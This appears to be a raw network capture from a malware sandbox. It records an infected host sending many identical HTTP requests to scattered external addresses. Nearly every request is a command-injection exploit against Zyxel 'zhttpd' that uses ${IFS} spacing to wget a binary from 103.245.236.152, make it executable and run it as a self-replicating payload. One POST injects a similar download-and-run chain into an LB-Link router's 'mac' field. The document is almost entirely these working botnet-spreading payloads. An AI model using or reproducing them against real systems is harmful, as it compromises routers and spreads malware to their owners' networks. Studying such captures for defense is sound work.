                                          Jan 14, 2024 15:46:28.274369001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7370192.168.2.234294871.192.175.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.274395943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7371192.168.2.2337622130.0.152.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.274405956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7372192.168.2.2333452110.222.217.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.274435043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7373192.168.2.2357282192.159.79.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.274455070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7374192.168.2.2348616106.136.141.242443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.274472952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7375192.168.2.2339906202.29.117.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.274525881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7376192.168.2.2360866116.132.99.184443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.274539948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7377192.168.2.233465234.35.111.39443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.274589062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7378192.168.2.2349068163.69.178.57443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.274589062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7379192.168.2.233716232.167.92.223443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.274614096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7380192.168.2.2359664170.118.29.68443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.274625063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7381192.168.2.235758264.48.192.73443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.274665117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7382192.168.2.2335146156.193.141.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.274703026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7383192.168.2.2343246160.123.42.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.274729967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7384192.168.2.2358200200.116.202.239443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.274738073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7385192.168.2.2359252161.77.67.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.274760008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7386192.168.2.233825613.177.250.96443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.274802923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7387192.168.2.234910088.54.174.50443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.274821043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7388192.168.2.2343304124.82.213.198443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.274852991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7389192.168.2.2338692125.157.90.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.274873018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7390192.168.2.2338548118.249.7.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.274924994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7391192.168.2.234543693.239.23.53443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.274945974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7392192.168.2.2345576171.64.113.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.275002956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7393192.168.2.2334808132.58.60.19443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.275021076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7394192.168.2.233601888.167.147.898080
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.847469091 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                          Cookie: user=admin
                                          Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                          Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7395192.168.2.2342142140.217.70.110443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.288829088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7396192.168.2.235659239.103.254.199443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.288870096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7397192.168.2.2339804188.248.39.253443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.288901091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7398192.168.2.235049841.214.254.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.288928032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7399192.168.2.2333906103.110.91.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.288960934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7400192.168.2.2359708126.106.37.127443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.289000988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7401192.168.2.235568043.25.192.49443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.289011955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7402192.168.2.23362202.76.130.144443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.289040089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7403192.168.2.2341586129.140.43.133443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.289064884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7404192.168.2.2351652138.241.216.253443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.289087057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7405192.168.2.2348964195.196.42.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.289107084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7406192.168.2.2355838147.240.137.243443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.289148092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7407192.168.2.2355684195.216.92.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.289180994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7408192.168.2.2347216132.255.96.243443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.289196968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7409192.168.2.2334826204.32.199.49443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.289231062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7410192.168.2.235313643.71.148.216443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.289252996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7411192.168.2.23485182.43.150.244443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.289287090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7412192.168.2.233285662.181.108.38443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.289309978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7413192.168.2.2351236151.161.54.52443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.289338112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7414192.168.2.2347138155.138.78.118443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.289366007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7415192.168.2.2343002143.105.192.27443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.289393902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7416192.168.2.235395896.65.7.108443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.289412022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7417192.168.2.2351808137.212.210.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.289443970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7418192.168.2.2350956221.176.247.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.289495945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7419192.168.2.2349744162.83.85.131443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.289519072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7420192.168.2.233826250.255.168.187443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.289556980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7421192.168.2.234120497.216.67.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.289566040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7422192.168.2.235359236.54.74.84443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.289582968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7423192.168.2.2359624200.251.229.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.289596081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7424192.168.2.2354698185.61.135.34443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.289609909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7425192.168.2.233527898.85.32.55443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.289661884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7426192.168.2.2342956176.109.233.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.289673090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7427192.168.2.235513270.206.83.21443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.289694071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7428192.168.2.2345794125.196.43.214443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.289724112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7429192.168.2.2340664108.211.160.35443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.289767027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7430192.168.2.2348950209.76.2.90443
                                          TimestampBytes transferredDirectionData
